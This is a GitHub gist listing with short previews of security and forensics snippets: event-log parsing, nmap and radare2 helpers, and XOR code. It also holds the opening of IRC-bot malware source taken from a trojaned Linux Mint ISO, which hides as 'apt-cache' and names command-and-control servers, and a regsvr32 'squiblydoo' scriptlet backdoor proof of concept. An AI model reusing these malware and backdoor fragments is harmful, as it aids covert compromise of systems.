Schrodinger schrodyn
schrodyn
/ man.cy
Created
February 22, 2016 13:41
— forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define STARTUP 1 | |
| #undef IDENT // Only enable this if you absolutely have to | |
| #define FAKENAME "apt-cache" // What you want this to hide as | |
| #define CHAN "#mint" // Channel to join | |
| #define KEY "bleh" // The key of the channel | |
| int numservers=5; // Must change this to equal number of servers down there | |
| char *servers[] = { | |
| "updates.absentvodka.com", | |
| "updates.mintylinux.com", | |
| "eggstrawdinarry.mylittlerepo.com", |
schrodyn
/ powershell_eventlog_parsing.ps1
Created
March 13, 2016 18:20
— forked from exp0se/powershell_eventlog_parsing.ps1
Powershell log parsing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Security log | |
| #============ | |
| #### | |
| #4624 - Logon & Logoff events successful | |
| #4625 - Logon unsucceful | |
| #### | |
| # Get usernames | |
| Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique | |
| # Get domains |
schrodyn
/ logparser.ps1
Last active
June 3, 2023 09:24
— forked from exp0se/logparser.ps1
Logparser log parsing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logparser | |
| # http://www.leeholmes.com/blog/2008/07/30/workaround-the-os-handles-position-is-not-what-filestream-expected/ | |
| $bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetField" | |
| $objectRef = $host.GetType().GetField("externalHostRef", $bindingFlags).GetValue($host) | |
| $bindingFlags = [Reflection.BindingFlags] "Instance,NonPublic,GetProperty" | |
| $consoleHost = $objectRef.GetType().GetProperty("Value", $bindingFlags).GetValue($objectRef, @()) | |
| [void] $consoleHost.GetType().GetProperty("IsStandardOutputRedirected", $bindingFlags).GetValue($consoleHost, @()) |
schrodyn
/ Backdoor-Minimalist.sct
Created
April 23, 2016 08:28
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
schrodyn
/ timeSync.bat
Created
April 30, 2016 13:52
— forked from thedom85/timeSync.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo on & @setlocal enableextensions | |
| @echo ========================= | |
| @echo Turn off the time service | |
| net stop w32time | |
| @echo ====================================================================== | |
| @echo Set the SNTP (Simple Network Time Protocol) source for the time server | |
| w32tm /config /syncfromflags:manual /manualpeerlist:"0.it.pool.ntp.org 1.it.pool.ntp.org 2.it.pool.ntp.org 3.it.pool.ntp.org" | |
| @echo ============================================= | |
| @echo ... and then turn on the time service back on | |
| net start w32time |
schrodyn
/ gdb-python2.7-ubuntu.sh
Created
May 14, 2016 20:58
— forked from zachriggle/gdb-python2.7-ubuntu.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get install python2.7-dev python2.7 | |
| apt-get build-dep gdb | |
| apt-get source gdb | |
| sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules | |
| dpkg-buildpackage -uc -us -j8 | |
| dpkg-install ../*.deb |
schrodyn
/ gnmap-parse.pl
Created
June 2, 2016 15:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env perl | |
| # | |
| # | |
| # Host: 10.10.9.8 () Ports: 21/open/tcp//ftp//Microsoft ftpd/, 25/open/tcp//smtp//Microsoft ESMTP 6.0.3790.4675/, | |
| # | |
| # | |
| use strict; | |
| use warnings; | |
| use Data::Dumper; |
schrodyn
/ yet another radare2 cheatsheet
Created
July 19, 2016 15:50
— forked from williballenthin/yet another radare2 cheatsheet.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # radare2 | |
| load without any analysis (file header at offset 0x0): r2 -n /path/to/file | |
| analyze all: aa | |
| list functions: afl | |
| seek to function: s sym.main | |
| open project: Po <name> | |
| save project: Ps <name> |
schrodyn
/ udp_read.c
Created
July 29, 2016 17:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <errno.h> | |
| #include <pcap.h> | |
| #include <arpa/inet.h> | |
| #define SIZE_ETHERNET 14 | |
| /* Callback function. */ | |
| void got_packet(u_char *args, const struct pcap_pkthdr *header, const |
schrodyn
/ xor.py
Created
August 13, 2016 13:29
— forked from revolunet/xor.py
Simple python XOR encrypt/decrypt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # NB : this is not secure | |
| # from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/ | |
| # added base64 encoding for simple querystring :) | |
| # | |
| def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False): | |
| from itertools import izip, cycle | |
| import base64 | |
| if decode: |
OlderNewer